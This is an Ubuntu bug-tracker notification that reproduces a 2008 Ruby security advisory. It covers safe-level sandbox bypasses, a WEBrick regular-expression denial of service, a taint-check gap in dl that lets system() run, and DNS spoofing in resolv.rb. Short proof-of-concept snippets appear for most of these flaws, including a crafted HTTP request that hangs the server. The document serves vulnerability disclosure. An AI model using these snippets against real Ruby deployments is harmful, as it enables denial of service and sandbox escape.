*** This bug is a security vulnerability *** You have been subscribed to a public security bug by Jamie Strandboge (jdstrand):
Last month Common Vulnerabilities and Exposures Reported multiple vulnerabilities that appear to be serious as an attacker can lead to denial of service condition or execute arbitrary code. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2662 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2663 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2725 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2726 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2664 Today the following was reported Several vulnerabilities in safe level have been discovered. * untrace_var is permitted at safe level 4. trace_var(:$VAR) {|val| puts "$VAR = #{val}" } Thread.new do $SAFE = 4 eval %q{ proc = untrace_var :$VAR proc.first.call("aaa") } end.join * $PROGRAM_NAME may be modified at safe level 4. Thread.new do $SAFE = 4 eval %q{$PROGRAM_NAME.replace "Hello, World!"} end.join $PROGRAM_NAME #=> "Hello, World!" * Insecure methods may be called at safe level 1-3. class Hello def world Thread.new do $SAFE = 4 msg = "Hello, World!" def msg.size self.replace self*10 # replace string 1 # return wrong size end msg end.value end end $SAFE = 1 # or 2, or 3 s = Hello.new.world if s.kind_of?(String) puts s if s.size < 20 # print string which size is less than 20 end * Syslog operations are permitted at safe level 4. require "syslog" Syslog.open Thread.new do $SAFE = 4 eval %q{ Syslog.log(Syslog::LOG_WARNING, "Hello, World!") Syslog.mask = Syslog::LOG_UPTO(Syslog::LOG_EMERG) Syslog.info("masked") Syslog.close } end.join These vulnerabilities were reported by Keita Yamaguchi. http://www.ruby-lang.org/en/news/2008/08/08/multiple-vulnerabilities-in-ruby/ DoS vulnerability in WEBrick WEBrick::HTTP::DefaultFileHandler is faulty of exponential time taking requests due to a backtracking regular expression in WEBrick::HTTPUtils.split_header_value. Exploitable server: require 'webrick' WEBrick::HTTPServer.new(:Port => 2000, :DocumentRoot => "/etc").start Attack: require 'net/http' res = Net::HTTP.start("localhost", 2000) { |http| req = Net::HTTP::Get.new("/passwd") req['If-None-Match'] = %q{meh=""} + %q{foo="bar" } * 100 http.request(req) } p res The request likely won't finish in this universe. This vulnerability was reported by Christian Neukirchen. Lack of taintness check in dl dl doesn't check taintness, so it could allow attackers to call dangerous functions. require 'dl' $SAFE = 1 h = DL.dlopen(nil) sys = h.sym('system', 'IP') uname = 'uname -rs'.taint sys[uname] This vulnerability was reported by sheepman. DNS spoofing vulnerability in resolv.rb resolv.rb allow remote attackers to spoof DNS answers. This risk can be reduced by randomness of DNS transaction IDs and source ports, so resolv.rb is fixed to randomize them. * see also: CVE-2008-1447 This vulnerability was reported by Tanaka Akira. Unfortunately, the suggestion to upgrade to the most recent version may also be a bad idea as mutliple individuals including myself have found that we get segmentation faults in the latest version. ** Affects: ruby-defaults (Ubuntu) Importance: Undecided Status: New -- multiple new ruby security vulnerabilities https://bugs.launchpad.net/bugs/255971 You received this bug notification because you are a member of Ubuntu Bugs, which is a direct subscriber. -- ubuntu-bugs mailing list [email protected] https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
